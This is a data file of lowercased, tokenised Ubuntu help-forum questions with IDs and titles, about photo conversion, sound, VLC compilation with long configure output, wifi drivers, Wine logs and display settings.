483379	how to convert cr2 to jpg or png ?	i need to convert a lot of cr2 photos to either jpg or png , no editing . how to do this ?
483383	need to reset authenic password !	i 'm having this extremely frustrating problem right now ! i bought a hp mini notebook 110-1025 from someone and before she sold it to me she did a system recovery and used this ubuntu program instead of just restoring it to the factory settings . but anyway i now have the problem of i ca n't update anything on my laptop because i need the authentic password she set-up but the password she is giving me isnât working and now i cant update and my computer is starting to lag ! i need to know how to bypass this in order to update my laptop or i need to know how to get into the settings of this ubuntu to be able to change `` her '' password ! how to solve this ?
483385	how to add folders to be synced with copy.com client	how do i add folder to synced with copy ? i ca n't add any in the sharing menu , neither right click to select folder nor drag and drop works .
483388	where can i find linux-tools-3.15.0-031500-generic for 14.04 ?	i just installed 3.15 kernel and i ca n't locate the corresponding linux-tools-3.15.0-031500-generic package . where can i find it ?
483392	lubuntu - compiling vlc v.1 command make and make install not working	good day everybody ! so , this is my first topic on ubuntu 's forum , and as a perfect linux beginner and a non-english speaking student , i 'll try to do my best to be the most explicit as i can . so here 's my problem : i recently wanted to install an older version of vlc media player because the newest ones are too buggy , and the package i downloaded was in tar.gz . so i found somewhere in the net that in order to install those package , you need to extract it to a place ( in my case /home/cermanialop/téléchargements/vlc-1.0.1 ) than install gcc to compile software . after i have done this , i gave in a terminal the path to the extracted files ( with the command cd /home/louis/téléchargements/vlc-1.0.1 ) , than i opened the install file which was included in the package to know what to do . here 's the content of the file : ******install file for the vlc media player more extensive information for *nix , windows , mac os x and beos users can be found here : http : //developers.videolan.org/vlc/ bootstrapping vlc ================= if you retrieved vlc from the git server and do not have a `` configure '' script , please refer to the hacking file . configuring vlc =============== a typical way to configure vlc is : ./configure -- prefix=/usr see `./configure -- help ' for more information . if you intend to debug stuff , you may want to compile with debugging symbols : make distclean ; ./configure -- prefix=/usr -- enable-debug we recommend using gcc to build vlc , though some people reported success with the intel c compiler ( version 8 ) as well . gcc version 3.3 or higher is required . on older systems ( e.g . freebsd 4.x , beos ) , please select a more recent version manually by setting the cc and cxx environment variables appropriately while running the ./configure shell script . building vlc ============ once configured , run `make ' to build vlc . installing and running vlc ========================== you can install the vlc and its plugins by typing : make install but you do n't need to install it if you do n't want to ; vlc can be launched from the current directory as well : ./vlc building packages ================= to build a debian package , you need to get the packaging info svn co svn : //svn.debian.org/pkg-multimedia/videolan/vlc/debian debian and then dpkg-buildpackage -rfakeroot -us -uc to build rpm packages , copy a spec file from extra/package/rpm and : rpm -ba vlc.spec to build an ipkg package ( ipaq familiar linux ) , use : ipkg-buildpackage****** i have been following all those settings ( first type ./configure to check directory for dependencies , after i run that , it give me this back : cermanialop @ cermanialop-r051cx : ~ $ cd /home/louis/téléchargements/vlc-1.0.1 cermanialop @ cermanialop-r051cx : ~/téléchargements/vlc-1.0.1 $ ./configure checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether to enable maintainer-specific portions of makefiles ... yes checking for style of include used by make ... gnu checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking for gcc option to accept iso c99 ... -std=gnu99 checking how to run the c preprocessor ... gcc -std=gnu99 -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking minix/config.h usability ... no checking minix/config.h presence ... no checking for minix/config.h ... no checking whether it is safe to define __extensions__ ... yes checking whether gcc -std=gnu99 and cc understand -c and -o together ... yes checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking dependency style of g++ ... gcc3 checking how to run the c preprocessor ... gcc -std=gnu99 -e checking for gcc ... gcc checking whether we are using the gnu objective c compiler ... no checking whether gcc accepts -g ... no checking dependency style of gcc ... gcc3 checking dependency style of gcc ... ( cached ) gcc3 checking for egrep ... ( cached ) /bin/grep -e checking whether make sets $ ( make ) ... ( cached ) yes checking for a bsd-compatible install ... /usr/bin/install -c checking dependency style of gcc -std=gnu99 ... gcc3 checking for ranlib ... ranlib checking for strip ... strip checking for ar ... ar checking for ld ... ld checking for dlltool ... no checking for an ansi c-conforming const ... yes checking for inline ... inline checking for c/c++ restrict keyword ... __restrict checking for libs in /home/louis/téléchargements/vlc-1.0.1/./extras/contrib ... no checking for a sed that does not truncate output ... /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by gcc -std=gnu99 ... ld checking if the linker ( ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking for ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... ( cached ) pass_all checking for ar ... ( cached ) ar checking for strip ... ( cached ) strip checking for ranlib ... ( cached ) ranlib checking command to parse /usr/bin/nm -b output from gcc -std=gnu99 object ... ok checking for dlfcn.h ... yes checking whether we are using the gnu c++ compiler ... ( cached ) yes checking whether g++ accepts -g ... ( cached ) yes checking dependency style of g++ ... ( cached ) gcc3 checking how to run the c++ preprocessor ... g++ -e checking for objdir ... .libs checking if gcc -std=gnu99 supports -fno-rtti -fno-exceptions ... no checking for gcc -std=gnu99 option to produce pic ... -fpic -dpic checking if gcc -std=gnu99 pic flag -fpic -dpic works ... yes checking if gcc -std=gnu99 static flag -static works ... yes checking if gcc -std=gnu99 supports -c -o file.o ... yes checking if gcc -std=gnu99 supports -c -o file.o ... ( cached ) yes checking whether the gcc -std=gnu99 linker ( ld ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking for shl_load ... no checking for shl_load in -ldld ... no checking for dlopen ... no checking for dlopen in -ldl ... yes checking whether a program can dlopen itself ... yes checking whether a statically linked program can dlopen itself ... no checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no checking for ld used by g++ ... ld checking if the linker ( ld ) is gnu ld ... yes checking whether the g++ linker ( ld ) supports shared libraries ... yes checking for g++ option to produce pic ... -fpic -dpic checking if g++ pic flag -fpic -dpic works ... yes checking if g++ static flag -static works ... yes checking if g++ supports -c -o file.o ... yes checking if g++ supports -c -o file.o ... ( cached ) yes checking whether the g++ linker ( ld ) supports shared libraries ... yes checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether nls is requested ... yes checking for msgfmt ... no checking for gmsgfmt ... : checking for xgettext ... no checking for msgmerge ... no checking for ld used by gcc ... ld checking if the linker ( ld ) is gnu ld ... yes checking for shared library run path origin ... done checking for cfpreferencescopyappvalue ... no checking for cflocalecopycurrent ... no checking for gnu gettext in libc ... yes checking whether to use nls ... yes checking where the gettext function comes from ... libc checking for iconv ... yes checking for working iconv ... yes checking for iconv declaration ... extern size_t iconv ( iconv_t cd , char * *inbuf , size_t *inbytesleft , char * *outbuf , size_t *outbytesleft ) ; checking for buggy gnu/libc versions ... not present checking for shared objects suffix ... .so checking for gettimeofday ... yes checking for isatty ... yes checking for sigrelse ... yes checking for getpwuid_r ... yes checking for memalign ... yes checking for posix_memalign ... yes checking for if_nametoindex ... yes checking for getenv ... yes checking for putenv ... yes checking for setenv ... yes checking for ctime_r ... yes checking for lrintf ... no checking for daemon ... yes checking for fork ... yes checking for lstat ... yes checking for posix_fadvise ... yes checking for posix_madvise ... yes checking for uselocale ... yes checking for working alloca.h ... yes checking for alloca ... yes checking for fcntl ... yes checking for asprintf ... yes checking for atof ... yes checking for atoll ... yes checking for getcwd ... yes checking for gmtime_r ... yes checking for lldiv ... yes checking for localtime_r ... yes checking for rewind ... yes checking for strcasecmp ... yes checking for strcasestr ... yes checking for strdup ... yes checking for strlcpy ... no checking for strncasecmp ... yes checking for strndup ... yes checking for strnlen ... yes checking for strsep ... yes checking for strtof ... yes checking for strtoll ... yes checking for vasprintf ... yes checking for swab ... yes checking for stricmp ... no checking for strnicmp ... no checking for fdatasync ... yes checking for vmsplice ... yes checking for mmap ... yes checking for setlocale ... yes checking langinfo.h usability ... yes checking langinfo.h presence ... yes checking for langinfo.h ... yes checking for nl_langinfo ... yes checking for nl_langinfo and codeset ... yes checking for connect ... yes checking for send ... yes checking for socklen_t in sys/socket.h ... yes checking for struct sockaddr_storage ... yes checking for library containing getaddrinfo ... none required checking for getnameinfo ... yes checking for gai_strerror ... yes checking for struct addrinfo ... yes checking for va_copy ... yes checking for __va_copy ... yes checking for inet_aton ... yes checking for getopt_long ... yes checking return type of signal handlers ... void checking for cos in -lm ... yes checking for pow in -lm ... yes checking for sqrt in -lm ... yes checking for ceil in -lm ... yes checking for exp in -lm ... yes checking for round in -lm ... yes checking for sqrtf in -lmx ... no checking mach-o/dyld.h usability ... no checking mach-o/dyld.h presence ... no checking for mach-o/dyld.h ... no checking dl.h usability ... no checking dl.h presence ... no checking for dl.h ... no checking for shl_load ... ( cached ) no checking for dld_link in -ldld ... no checking image.h usability ... no checking image.h presence ... no checking for image.h ... no checking for load_add_on ... no checking for dlfcn.h ... ( cached ) yes checking sys/dl.h usability ... no checking sys/dl.h presence ... no checking for sys/dl.h ... no checking for dlopen ... ( cached ) no checking for dlopen in -ldl ... ( cached ) yes checking for main in -lpthread ... yes checking for clock_nanosleep in -lrt ... yes checking for nanosleep ... yes checking for strncasecmp in strings.h ... yes checking getopt.h usability ... yes checking getopt.h presence ... yes checking for getopt.h ... yes checking for strings.h ... ( cached ) yes checking locale.h usability ... yes checking locale.h presence ... yes checking for locale.h ... yes checking xlocale.h usability ... yes checking xlocale.h presence ... yes checking for xlocale.h ... yes checking fcntl.h usability ... yes checking fcntl.h presence ... yes checking for fcntl.h ... yes checking for sys/types.h ... ( cached ) yes checking sys/time.h usability ... yes checking sys/time.h presence ... yes checking for sys/time.h ... yes checking sys/times.h usability ... yes checking sys/times.h presence ... yes checking for sys/times.h ... yes checking sys/ioctl.h usability ... yes checking sys/ioctl.h presence ... yes checking for sys/ioctl.h ... yes checking for sys/stat.h ... ( cached ) yes checking sys/mount.h usability ... yes checking sys/mount.h presence ... yes checking for sys/mount.h ... yes checking arpa/inet.h usability ... yes checking arpa/inet.h presence ... yes checking for arpa/inet.h ... yes checking netinet/in.h usability ... yes checking netinet/in.h presence ... yes checking for netinet/in.h ... yes checking netinet/udplite.h usability ... no checking netinet/udplite.h presence ... no checking for netinet/udplite.h ... no checking sys/eventfd.h usability ... yes checking sys/eventfd.h presence ... yes checking for sys/eventfd.h ... yes checking for net/if.h ... yes checking machine/param.h usability ... no checking machine/param.h presence ... no checking for machine/param.h ... no checking sys/shm.h usability ... yes checking sys/shm.h presence ... yes checking for sys/shm.h ... yes checking linux/version.h usability ... yes checking linux/version.h presence ... yes checking for linux/version.h ... yes checking linux/dccp.h usability ... yes checking linux/dccp.h presence ... yes checking for linux/dccp.h ... yes checking syslog.h usability ... yes checking syslog.h presence ... yes checking for syslog.h ... yes checking whether time.h and sys/time.h may both be included ... yes checking for ssize_t ... yes checking for library containing poll ... none required checking dirent.h usability ... yes checking dirent.h presence ... yes checking for dirent.h ... yes checking for nanosleep in time.h ... yes checking for timespec in sys/time.h ... yes checking pthread.h usability ... yes checking pthread.h presence ... yes checking for pthread.h ... yes checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking zlib.h usability ... yes checking zlib.h presence ... yes checking for zlib.h ... yes checking for minizip ... no checking unzip.h usability ... no checking unzip.h presence ... no checking for unzip.h ... no checking for hal ... no configure : warning : libhal > = 0.5.0 was not found . install libhal-dev ? checking for mtp ... no configure : warning : mtp library not found checking for dbus ... yes checking for ntohl in sys/param.h ... no checking if gcc -std=gnu99 accepts -wall ... yes checking if gcc -std=gnu99 accepts -wextra ... yes checking if gcc -std=gnu99 accepts -wsign-compare ... yes checking if gcc -std=gnu99 accepts -wundef ... yes checking if gcc -std=gnu99 accepts -wpointer-arith ... yes checking if gcc -std=gnu99 accepts -wbad-function-cast ... yes checking if gcc -std=gnu99 accepts -wcast-align ... yes checking if gcc -std=gnu99 accepts -wwrite-strings ... yes checking if gcc -std=gnu99 accepts -wmissing-prototypes ... yes checking if gcc -std=gnu99 accepts -wvolatile-register-var ... yes checking if gcc -std=gnu99 accepts -werror-implicit-function-declaration ... yes checking if gcc -std=gnu99 accepts -pipe ... yes checking if $ cc accepts -os ... yes checking if $ cc accepts -o4 ... yes checking if $ cc accepts -o3 ... yes checking if $ cc accepts -o2 ... yes checking if $ cc accepts -o0 ... yes checking if $ cc accepts -ffast-math ... yes checking if $ cc accepts -funroll-loops ... yes checking if $ cc accepts -fomit-frame-pointer ... yes checking if $ cc accepts -bundle -undefined error ... no checking __attribute__ ( ( aligned ( ) ) ) support ... 64 checking for __attribute__ ( ( packed ) ) ... yes checking execinfo.h usability ... yes checking execinfo.h presence ... yes checking for execinfo.h ... yes checking for backtrace ... yes checking if gcc -std=gnu99 groks mmx intrinsics ... yes checking if gcc -std=gnu99 groks mmx inline assembly ... yes checking if gcc -std=gnu99 groks mmx ext inline assembly ... yes checking if gcc -std=gnu99 groks sse2 intrinsics ... yes checking if gcc -std=gnu99 groks sse inline assembly ... yes checking if gcc -std=gnu99 groks sse2 inline assembly ... yes checking if gcc -std=gnu99 groks 3d now ! inline assembly ... yes checking whether gcc -std=gnu99 accepts -mtune=pentium2 ... yes checking for lua ... no configure : warning : lua5.1 not found , trying lua > = 5.1 instead checking for lua ... no checking lua.h usability ... no checking lua.h presence ... no checking for lua.h ... no checking lauxlib.h usability ... no checking lauxlib.h presence ... no checking for lauxlib.h ... no checking lualib.h usability ... no checking lualib.h presence ... no checking for lualib.h ... no checking for lual_newstate in -llua5.1 ... no checking for lual_newstate in -llua51 ... no checking for lual_newstate in -llua ... no configure : warning : lua > = 5.1 not found ! checking for libproxy ... no checking for notify ... no checking for taglib ... no configure : warning : taglib library not found checking livemedia_version.hh usability ... no checking livemedia_version.hh presence ... no checking for livemedia_version.hh ... no checking livemedia.hh usability ... no checking livemedia.hh presence ... no checking for livemedia.hh ... no configure : warning : the development files for livemedia ( live555 ) ca n't be found checking dvdread/dvd_reader.h usability ... no checking dvdread/dvd_reader.h presence ... no checking for dvdread/dvd_reader.h ... no checking libdvdread/dvd_reader.h usability ... no checking libdvdread/dvd_reader.h presence ... no checking for libdvdread/dvd_reader.h ... no checking for dvdnav-config ... no checking libsmbclient.h usability ... no checking libsmbclient.h presence ... no checking for libsmbclient.h ... no checking for struct _smbcctx.close_fn ... no checking for dvbpsi/dr.h ... no configure : warning : can not find libdvbpsi headers checking for dvbpsi_gensdtsections in -ldvbpsi ... no checking linux/videodev2.h usability ... yes checking linux/videodev2.h presence ... yes checking for linux/videodev2.h ... yes checking for libv4l2 ... no configure : warning : libv4l2 support disabled because libv4l2 development headers were not found checking for libcdio ... no configure : warning : cd reading and information library not found checking for vcdinfo ... no configure : warning : vcd information library not found checking for cdrom_msf0 in linux/cdrom.h ... yes checking for scsireq in sys/scsiio.h ... no checking for ioc_toc_header in sys/cdio.h ... no checking for libcddb ... no configure : warning : new enough libcddb not found . cddb access disabled configure : warning : the dvb access module requires libdvbpsi checking for inet_pton ... yes checking for inet_ntop ... yes checking ogg/ogg.h usability ... no checking ogg/ogg.h presence ... no checking for ogg/ogg.h ... no checking ebml/ebmlversion.h usability ... no checking ebml/ebmlversion.h presence ... no checking for ebml/ebmlversion.h ... no checking libmodplug/modplug.h usability ... no checking libmodplug/modplug.h presence ... no checking for libmodplug/modplug.h ... no checking mpc/mpcdec.h usability ... no checking mpc/mpcdec.h presence ... no checking for mpc/mpcdec.h ... no checking mpcdec/mpcdec.h usability ... no checking mpcdec/mpcdec.h presence ... no checking for mpcdec/mpcdec.h ... no configure : warning : only static linking is available , you must provide a gme-tree checking mad.h usability ... no checking mad.h presence ... no checking for mad.h ... no configure : error : could not find libmad on your system : you may get it from http : //www.underbit.com/products/mad/ . alternatively you can use -- disable-mad to disable the mad plugin . as you could see , it returns that i am missing something , but as i am a noob in linux , i do n't know what and how i can get it , so i continued to follow the instructions by typing next : make and this give me the following error-message : cermanialop @ cermanialop-r051cx : ~/téléchargements/vlc-1.0.1 $ make make : *** no targets specified and no makefile found . stop . cermanialop @ cermanialop-r051cx : ~/téléchargements/vlc-1.0.1 $ i gave a look into my install folders , and i have noticed that i have no makefile file without extension , as i read somewhere else on the net , there should always be a makefile file without extension at the root of the install folder , in my case , i only have a makefile.am and makefile.in file at the root . so my question is , how do you create this file in order to make the make command working ? or am i missing something obvious for the installation ? many thanks for the help : )
483394	no sound after waking from sleep	i 'm running ubuntu 14.04 on a toshiba laptop and there is an issue with sound . the sound works fine after a restart but after waking up from sleep the computer can not output any audio . is there something to check on this ?
483396	how do i create mime types for new documents ( command line ) ?	how do i give my application 's custom document a custom icon ? additionally , how do i make the file manager open these documents when a user double clicks on them ? i have to do this on the command line because the solution will be used inside an installation script .
483397	missing sound volume icon on screen top ( 14.04 )	i have recently installed a fresh ubuntu 14.04 . but the volume icon is missing . i can hear all kinds of sounds ( rythmbox , youtube videos , ... ) ... i have already tried to install the package indicator-sound and is already installed and updated . i can change the volume using the alsamixer command , but is not practical ... any idea would be of great help . thanks in advance .
483400	wifi drivers wo n't work after i upgraded kernel to 3.4 for ubuntu 12.04	my wifi support got broken after i upgraded my kernel from 3.2 to 3.4 for ubuntu 12.04 . i know i need to use sudo apt-get install firmware-b43-installer but whenever i type it into terminal , i get : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package firmware-b43-installer i also tried using synaptic package manager but when i search for firmware-b43-installer i do n't see any options . check box for proprietary drivers for devices ( restricted ) has also been selected from settings- > repositories but i still do n't see firmware-b43-installer . running lspci -vvnn | grep 14e4 command on the terminal gives : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) i am worried that i may have deleted some important package while trying to fix wifi . please help i am very new to ubuntu .
483401	macbook 10.5.8 2ghz core 2 duo and 2gb ram . which ubuntu version ?	i have an impossible to update macbook 10.5.8 2ghz core 2 duo and 2gb ram . which ubuntu version should i use ? 64 mac/32/64 ?
483404	ubuntu login freezing	when i boot up my computer i come to the welcome screen , when i type in my password and hit enter the text box go 's away and just stays there i 'm using 13.10 if you have any idea please help .
483405	problems to open qdaminer lite with playonlinux	i need urgent help ! i use qda miner lite for qualitative analysis , i have always opened it with playonlinux , but it had stopped to work last week . i do n't know why or how to fix it . thanks a lot ! this is the log file : [ 06/14/14 17:35:16 ] - running wine- -- version ( working directory : /usr/share/playonlinux/python ) wine-1.6.2 playonlinux logfile -- -- -- -- -- -- -- -- -- - date : 06/14/14 17:35:16 > playonlinux version 4.2.2 > uname -a linux mezcolanza-inspiron-3437 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux > lsb_release -a > wine -- version wine-1.6.2 > pol_wineversion > wineprefix /home/mezcolanza/.playonlinux//wineprefix/qdaminer > distribution ubuntu 14.04 lts > glxinfo \| grep rendering direct rendering : yes > glxinfo \| grep renderer glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , opengl renderer string : mesa dri intel ( r ) haswell mobile > opengl libs ( direct rendering testing ) [ 06/14/14 17:35:17 ] - this is a 32bits prefix ! [ 06/14/14 17:35:20 ] - running wine- cmd /c echo % programfiles % ( working directory : /usr/share/playonlinux/python ) c : \program files [ 06/14/14 17:36:33 ] - running wine- /home/mezcolanza/descargas/setupqmlite13.exe ( working directory : / ) fixme : process : setprocessdeppolicy ( 1 ) : stub fixme : process : setprocessdeppolicy ( 1 ) : stub fixme : ntdll : find_reg_tz_info ca n't find matching timezone information in the registry for bias 240 , std ( d/m/y ) : 27/04/2014 , dlt ( d/m/y ) : 7/09/2014 fixme : win : disableprocesswindowsghosting : stub fixme : msg : changewindowmessagefilter c045 00000001 fixme : msg : changewindowmessagefilter c045 00000001 fixme : msg : changewindowmessagefilter c045 00000001 fixme : msg : changewindowmessagefilter c045 00000001 fixme : shell : shautocomplete stub fixme : sfc : sfcisfileprotected ( ( nil ) , l '' c : \\users\\public\\application data\\provalis research\\unins000.exe '' ) stub [ 06/14/14 17:37:01 ] - running wine- qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research ) modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido [ 06/14/14 17:37:05 ] - running wine- qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research ) modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido err : seh : raise_exception exception frame is not in stack limits = > unable to dispatch exception . [ 06/14/14 17:42:37 ] - running wine- winecfg ( working directory : /usr/share/playonlinux/python ) [ 06/14/14 17:42:47 ] - running wine- qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research ) modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido [ 06/14/14 17:49:04 ] - running wine- qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research ) modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido [ 06/14/14 17:52:45 ] - running wine- qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research ) modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido [ 06/14/14 17:52:46 ] - running wine- qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research ) modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido [ 06/14/14 17:54:23 ] - running wine-1.7.20 wineboot ( working directory : /usr/share/playonlinux/python ) fixme : ntdll : ntlockfile i/o completion on lock not implemented yet fixme : ntdll : find_reg_tz_info ca n't find matching timezone information in the registry for bias 240 , std ( d/m/y ) : 27/04/2014 , dlt ( d/m/y ) : 7/09/2014 fixme : ntdll : ntlockfile i/o completion on lock not implemented yet fixme : ntdll : find_reg_tz_info ca n't find matching timezone information in the registry for bias 240 , std ( d/m/y ) : 27/04/2014 , dlt ( d/m/y ) : 7/09/2014 fixme : dwmapi : dwmiscompositionenabled 0x6b238dcc fixme : iphlpapi : notifyaddrchange ( handle 0xdbe8b0 , overlapped 0xdbe8bc ) : stub fixme : ntdll : server_ioctl_file unsupported ioctl 9800012c ( device=9800 access=0 func=4b method=0 ) fixme : winsock : server_ioctl_sock unsupported ioctl 9800012c ( device=9800 access=0 func=4b method=0 ) fixme : winsock : wsaioctl unsupported ws_ioctl cmd ( _wsaiow ( ioc_vendor , 300 ) ) fixme : ntdll : server_ioctl_file unsupported ioctl 9800012c ( device=9800 access=0 func=4b method=0 ) fixme : winsock : server_ioctl_sock unsupported ioctl 9800012c ( device=9800 access=0 func=4b method=0 ) fixme : winsock : wsaioctl unsupported ws_ioctl cmd ( _wsaiow ( ioc_vendor , 300 ) ) fixme : ntdll : find_reg_tz_info ca n't find matching timezone information in the registry for bias 240 , std ( d/m/y ) : 27/04/2014 , dlt ( d/m/y ) : 7/09/2014 wine : configuration in '/home/mezcolanza/.playonlinux/wineprefix/qdaminer ' has been updated . [ 06/14/14 17:54:49 ] - running wine-1.7.20 winecfg ( working directory : /usr/share/playonlinux/python ) fixme : msg : pack_message msg 14 ( wm_erasebkgnd ) not supported yet fixme : msg : pack_message msg 14 ( wm_erasebkgnd ) not supported yet [ 06/14/14 17:55:42 ] - running wine-1.7.20 /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research/qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/winepmodify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido err : seh : raise_exception exception frame is not in stack limits = > unable to dispatch exception . [ 06/14/14 17:56:21 ] - running wine-1.7.20 qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research ) modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido [ 06/14/14 18:06:00 ] - running wine-1.7.20 qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research ) modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido [ 06/14/14 18:06:07 ] - running wine-1.7.20 qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research ) modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido [ 06/14/14 18:15:41 ] - running wine-1.7.20 qdalite.exe ( working directory : /home/mezcolanza/.playonlinux/wineprefix/qdaminer/drive_c/program files/provalis research ) modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido modify_ldt : argumento inválido err : seh : raise_exception exception frame is not in stack limits = > unable to dispatch exception .
483406	zte mf730m usb modem wo n't connect to the internet ?	i am trying to connect to a 3g network using my zte mf730m modem . when i try to connect in windows 8 , it just asks for my pin code and then it connects directly without problems . in ubuntu 12.04 the usb modem is recognized as a storage but also as a `` wired connection '' that connects automatically . the problem is that i do not have internet access . it does not ask for my pin . i have also searched in the connection properties but i have not found a place to input the pin number . i have also tried to make a broadband connection with the correct apn and pin number but this connection is never used by the system . also in lsusb the device code is : bus 003 device 011 : id 19d2:1405 zte wcdma technologies msm what can i try to solve the problem ? thanks in advance .
483408	ubuntu league of legends very slow	first let me introduce myself . i am raul , the ceo of cobrastudios . i just started using linux ( ubuntu ) . now i have an problem fixing everything i want to have on linux . like minecraft , league of legends , origin , curse . minecraft and league of legends are already on my computer . so i just started league of legends and it started with medium video settings and lagged so hard i couldt even play . 40 fps on slowest settings . 07 fps on highest settings . an also minecraft has big frame drops . my specs : intel core i7-3630qm cpu / 2.0 ghz / 4 cores , 8 threads . nvidia geforce gt 650m 2gb . 6 gb ram . on windows everything runs smoothly . i will really appreciate you'r help ! greetings , raul de heer . from the netherlands . - cobrastudios .
483411	tv as monitor overscans	my sharp tv overscans . every edge are out of the screen : - ( i use xubuntu 14.04 . i have tried to solve the issue , but i was n't able to do it . pc @ roland : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 1280 x 720 , maximum 32767 x 32767 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) hdmi2 connected 1280x720+0+0 ( normal left inverted right x axis y axis ) 440mm x 250mm 1920x1080i 60.1 + 50.0 60.0 1280x720 60.0* 50.0 59.9 720x576 50.0 720x480 60.0 59.9 39.2 640x480 60.0 59.9 virtual1 disconnected ( normal left inverted right x axis y axis ) pc @ roland : ~ $ xrandr -- output hdmi2 -- set underscan on x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 11 ( rrqueryoutputproperty ) serial number of failed request : 37 current serial number in output stream : 37 so what is the solution ?
483415	xubuntu 14.04 ignoring screen layout changes	i have two screens of different sizes on an old nvidia card . when i login the smaller ( left-side ) screen aligns to the top of the larger screen . i want to align it to the bottom but changing the nvidia settings has no effect : initial settings after editing note that i have also changed the `` primary '' screen to the larger display . no effect if i click apply then reopen the settings , my changes are gone . if i click save to x configuration file , my changes are saved to the conf file but have no effect , even after restarting the x server . update running the nvidia settings from the command line : gksudo nvidia-settings & gave me the following when i clicked apply : the program 'nvidia-settings ' received an x window system error . this probably reflects a bug in the program . the error was 'badvalue ( integer parameter out of range for operation ) ' . ( details : serial 612 error_code 2 request_code 158 minor_code 25 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) job 1 , âgksudo nvidia-settings & â has ended adding that info to this question has caused askubuntu to suggest some interesting related questions that suggest that changing my nvidia drivers might help . now i just need to work out how to do that without breaking something .
483416	keyboard and mouse unresponsive after suspend	i have a toshiba satellite s55-a5154 with 14.04 installed . every time it resumes from being suspended , neither the keyboard nor mouse work . what can i do to fix this or provide you with more info ?
